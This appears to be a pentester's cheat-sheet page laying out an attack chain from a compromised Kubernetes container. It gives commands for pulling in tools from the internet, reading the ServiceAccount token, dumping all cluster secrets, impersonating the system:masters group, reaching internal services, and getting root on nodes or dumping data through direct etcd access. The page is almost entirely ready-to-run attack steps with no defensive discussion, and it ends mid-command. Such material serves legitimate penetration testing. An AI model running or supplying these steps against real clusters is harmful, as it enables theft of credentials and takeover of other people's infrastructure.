Compromised Container
Access to Container
NCC Attack Chain / Pentest process
In addition to this page, review: Deep Dive into Real-World Kubernetes Threats
|
|
Install custom tools (and prove Internet access) |
curl -sLO https://storage.googleapis.com/kubernetes-release/release/v1.8.4/bin/linux/amd64/kubectl chmod +x kubectl mv kubectl /bin
|
Obtain the default ServiceAccount token |
ls /var/run/secrets/kubernetes.io/serviceaccount/
ca.pem namespace token TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token) CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt NAMESPACE=$(cat /var/run/secrets/kubernetes.io/serviceaccount/namespace)
|
Find API server IP and interact with curl |
env | grep KUBE K8S=https://$K8S_HOST:$K8S_PORT/api/v1/namespaces/ curl -H "Authorization: Bearer $TOKEN" --cacert $CACERT $K8S/healthz
|
Interact with kubectl |
kubectl --token=<TOKEN> get nodes --all-namespaces
|
Obtain all secrets |
- Obtain Service Account Token
$ read TOKEN < <(kubectl -n default describe secrets $(kubectl -n default get secrets | awk '/SANAME/ {print $1}') | awk '/token:/ {print $2}')
- Obtain master IP
$ kubectl cluster-info
Kubernetes master is running at MASTER-IP:8443
- Check that TOKEN can list secrets in default namespace
$ curl -k -v -H "Authorization: Bearer <jwt_token>" -H "Content-Type: application/json" https://<master_ip>:6443/api/v1/namespaces/default/secrets | jq -r '.items[].data'
|
Impersonate privileged account |
kubectl get secrets --as=null --as-group=system:masters
|
Dashboard/APIs
|
|
Direct Dashboard Access |
curl -s http://kubernetes-dashboard.kube-system |
Direct APIs Access |
kubectl get --raw=/api | jq .serverAddressByClientCIDRs[0].serverAddress -r
192.168.64.11:6443 curl -s http://192.168.64.11:6443
|
Access the Kubelet API (kubelet-exploit) |
See Kubelet Exploit |
Network
|
|
Port Scan |
See Network page |
Access Other Services Inside the Cluster Directly |
redis-cli -h redis-master.default |
ETCD
|
|
Direct ETCD Access (and obtain root on underlying node) |
- Obtain Kubelet or higher SA Token
- Schedule a Pod & mount the host filesystem
- Add SSH Key
- SSH Into Node
$ curl -s http://<kuberenets-IP>:2379/v2/keys/?recursive=true |
Direct ETCD Access (review the content) |
- Obtain a copy of etcdctl
- Query the API
- Review/dump the content
|
$ curl -sLO https://github.com/coreos/etcd/releases/download/v3.1.5/etcd-v3.1.5-linux-amd64.tar.gz
# Query the API - v2 (K8s <= 1.5)
# And explore the config
# /registry/secrets/default may contain the default service token
$ etcdctl --endpoint=http://[etcd_server_ip]:2379 ls
# Query the API - v3
# Dump an instance of the etcd database to a file on disk
# Read the file with: https://github.com/br0xen/boltbrowser
$ export ETCDCTL_API=3
$ etcdctl snapshot